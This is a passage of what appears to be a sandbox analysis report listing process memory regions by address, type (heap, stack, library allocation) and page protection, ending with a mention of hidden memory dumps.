stack
|
page read and write
|
||
|
150A8DAA000
|
heap
|
page read and write
|
||
|
150A8D21000
|
heap
|
page read and write
|
||
|
1EBC0BF3000
|
trusted library allocation
|
page read and write
|
||
|
1A04DF7F000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4A0000
|
trusted library allocation
|
page read and write
|
||
|
1A04C510000
|
trusted library allocation
|
page read and write
|
||
|
150A8D18000
|
heap
|
page read and write
|
||
|
4854DCE000
|
stack
|
page read and write
|
||
|
7FFB4B372000
|
trusted library allocation
|
page read and write
|
||
|
1EBD8D00000
|
heap
|
page read and write
|
||
|
150A6C50000
|
heap
|
page read and write
|
||
|
7FFB4B360000
|
trusted library allocation
|
page execute and read and write
|
||
|
150A8BB0000
|
heap
|
page read and write
|
||
|
1A04CCB7000
|
trusted library allocation
|
page read and write
|
||
|
1EBBEF30000
|
heap
|
page read and write
|
||
|
1A0649B0000
|
heap
|
page read and write
|
||
|
1A04DF79000
|
trusted library allocation
|
page read and write
|
||
|
4853E7E000
|
stack
|
page read and write
|
||
|
1EBD8DF0000
|
heap
|
page read and write
|
||
|
254E4FF000
|
stack
|
page read and write
|
||
|
1A04CC8B000
|
trusted library allocation
|
page read and write
|
||
|
1A04C840000
|
heap
|
page read and write
|
||
|
1EBC0D2F000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B440000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B360000
|
trusted library allocation
|
page execute and read and write
|
||
|
150A8BE5000
|
heap
|
page read and write
|
||
|
150A8BE2000
|
heap
|
page read and write
|
||
|
7FFB4B430000
|
trusted library allocation
|
page read and write
|
||
|
150A6D37000
|
heap
|
page read and write
|
||
|
1EBC0A2B000
|
heap
|
page read and write
|
||
|
1A05CB89000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B400000
|
trusted library allocation
|
page read and write
|
||
|
1A04A791000
|
heap
|
page read and write
|
||
|
150A6DD9000
|
heap
|
page read and write
|
||
|
150A8BB7000
|
heap
|
page read and write
|
||
|
150A8CBC000
|
heap
|
page read and write
|
||
|
7FFB4B4B0000
|
trusted library allocation
|
page read and write
|
||
|
150A8BFB000
|
heap
|
page read and write
|
||
|
7FFB4B390000
|
trusted library allocation
|
page read and write
|
||
|
150A8D26000
|
heap
|
page read and write
|
||
|
1A04C540000
|
trusted library allocation
|
page read and write
|
||
|
150A8F56000
|
heap
|
page read and write
|
||
|
7FFB4B350000
|
trusted library allocation
|
page execute and read and write
|
||
|
150A6D2C000
|
heap
|
page read and write
|
||
|
1A04A78E000
|
heap
|
page read and write
|
||
|
7FFB4B34A000
|
trusted library allocation
|
page read and write
|
||
|
1EBBEC94000
|
heap
|
page read and write
|
||
|
254E97E000
|
stack
|
page read and write
|
||
|
1EBBEC20000
|
trusted library allocation
|
page read and write
|
||
|
150A6C80000
|
heap
|
page read and write
|
||
|
150A6D36000
|
heap
|
page read and write
|
||
|
1EBC11D8000
|
trusted library allocation
|
page read and write
|
||
|
4464CFE000
|
stack
|
page read and write
|
||
|
7FFB4B3A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B193000
|
trusted library allocation
|
page execute and read and write
|
||
|
150A8DAA000
|
heap
|
page read and write
|
||
|
1A04CC76000
|
trusted library allocation
|
page read and write
|
||
|
150A8EA6000
|
heap
|
page read and write
|
||
|
1A04A730000
|
heap
|
page read and write
|
||
|
7FFB4B490000
|
trusted library allocation
|
page read and write
|
||
|
1A04A802000
|
heap
|
page read and write
|
||
|
7FFB4B19D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EBC109B000
|
trusted library allocation
|
page read and write
|
||
|
1EBD8DEE000
|
heap
|
page read and write
|
||
|
150A8FA9000
|
heap
|
page read and write
|
||
|
7FFB4B490000
|
trusted library allocation
|
page read and write
|
||
|
4853D7E000
|
stack
|
page read and write
|
||
|
1A04C190000
|
trusted library allocation
|
page read and write
|
||
|
150A8BB4000
|
heap
|
page read and write
|
||
|
150A8F71000
|
heap
|
page read and write
|
||
|
1EBC0C54000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B240000
|
trusted library allocation
|
page read and write
|
||
|
1A05C8A0000
|
trusted library allocation
|
page read and write
|
||
|
1A04A944000
|
heap
|
page read and write
|
||
|
1A04A920000
|
heap
|
page read and write
|
||
|
150A6DC5000
|
heap
|
page read and write
|
||
|
7FFB4B246000
|
trusted library allocation
|
page read and write
|
||
|
150A6DBC000
|
heap
|
page read and write
|
||
|
150A8F5E000
|
heap
|
page read and write
|
||
|
150A8DAA000
|
heap
|
page read and write
|
There are 405 hidden memdumps, click here to show them.